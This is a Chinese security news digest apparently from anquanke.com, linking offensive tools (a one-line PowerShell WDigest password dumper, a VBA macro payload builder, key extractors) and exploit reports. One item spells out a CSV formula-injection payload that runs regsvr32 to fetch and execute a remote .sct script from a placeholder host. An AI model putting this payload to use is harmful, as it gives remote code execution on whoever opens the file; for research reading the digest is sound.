[Tools]一行Powershell代码从内存中拿到Wdigest 密码
https://github.com/giMini/mimiDbg
[Tools]Invoke-MacroCreator: 用于创建VBA宏的word文档,可执行各种payload的powershell脚本
https://github.com/Arno0x/PowerShellScripts/tree/master/MacroCreator
[Tools]从Vdex文件反编译和提取Android Dex字节码的工具
https://github.com/anestisb/vdexExtractor
[Tools]IDA调试插件for android
https://github.com/zhkl0228/AndroidAttacher
[漏洞]Lenovo OEM-installed crapware comes with a nice Code Execution feature! Could be used to bypass app whitelisting or privesc (guest account to main user)
http://riscy.business/2017/12/lenovos-unsecured-objects/
[Tools]Linux内存加密密钥提取工具
https://github.com/cryptolok/crykex
[教程]在Debian 7.5 mipsel Ci20上运行Metasploit
https://astr0baby.wordpress.com/2017/12/10/running-metasploit-framework-on-debian-7-5-mipsel-ci20/
不用powershell.exe,通过.csv文件拿到shell
fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''https://twitter.com/G0ldenGunSec/status/939215702073991168
[漏洞]iOS/macOS – Kernel Double Free due to IOSurfaceRootUserClient not Respecting MIG Ownership Rules
https://www.exploit-db.com/exploits/43320/
[漏洞]MikroTik 6.40.5 ICMP – Denial of Service
https://www.exploit-db.com/exploits/43317/
作者:安全客小编2
如若转载,请注明出处: https://www.anquanke.com/post/id/90176